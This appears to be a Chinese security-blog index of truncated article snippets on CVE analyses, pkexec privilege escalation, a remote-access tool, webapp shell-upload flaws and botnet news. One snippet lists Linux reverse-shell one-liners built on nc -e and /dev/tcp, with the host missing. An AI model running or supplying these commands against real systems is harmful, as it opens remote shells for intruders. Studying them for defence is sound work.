一 前言 这是我收获的第一个CVE编号,在复现了winmt师傅的CVE-2023-34644后,他告诉我最新的固件虽然做了一些简单的处理,导致无法在未授权的情况下RCE,但因为没有从根源上对命令执行点...
CVE-2023-39785堆栈溢出漏洞分析
0x00 漏洞信息 Tenda AC8V4 V16.03.34.06版本中存在一个堆栈溢出漏洞,该漏洞位于set_qosMib_list函数的list参数中。 漏洞严重性评分(CVSS):未提供 指定...
命令行扫描器 -- scalpel
===================================免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负...
CVE-2021-4034:pkexec本地提权
影响范围Debain stretch policykit-1 < 0.105-18+deb9u2Debain buster policykit-1 < 0.105-25+deb10u1De...
GUN sed高级用法,sed脚本编写
这里举一些sed常用的高级用法例子经供参考:一下操作都针对file.txt文件作修改[root@QX-VPN ~]# cat file.txtlibgcc-4.4.7-4.el6.x86_64setu...
神兵利器 - RAT-el
RAT-el是一个开放源代码渗透测试工具,可让您控制Windows计算机。 &n...
内网渗透——反弹shell详解
声明:文章技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可用于 违法犯罪,一经发现直接上报国家安全机关处理。
星光贴吧 1.3 后台拿 Shell
星光贴吧 1.3 后台拿SHEL by:风之传说 今天分析了两个程序,都发了吧。。 好吧,我承认有点鸡肋。。 我们先来看看这个文件 Common/common.function.php: functi...
狂盗小说小偷 GET Shell 漏洞
By:Cond0r 很傻比的一漏洞 必须开启缓存才能利用 先看代码 book.php: $kd_cachedir = "./cache"; if($kd_book_cache=="ture"){//...
虐神百度小偷v1.0 前台GET SHELL
read.php 以下是引用片段: include( "require.php" ); if ( $cacheis == 1 && file_exists( "cache/read/"...
linux 五种反弹SHELL
1. nc -e /bin/bash 2. mknod backpipe p; nc 0backpipe 3. /bin/bash -i > /dev/tcp// 0&1 4. mkno...
微软识别出Kelihos僵尸网络的幕后黑手
在捣毁Kelihos僵尸网络四个月后,微软已经确定了这一网络毒瘤的幕后黑手,一位来自俄罗斯圣彼得堡的黑客Andrey N. Sabelnikov,他利用这个僵尸网络实现了大规模感染,从而发送垃圾邮件和...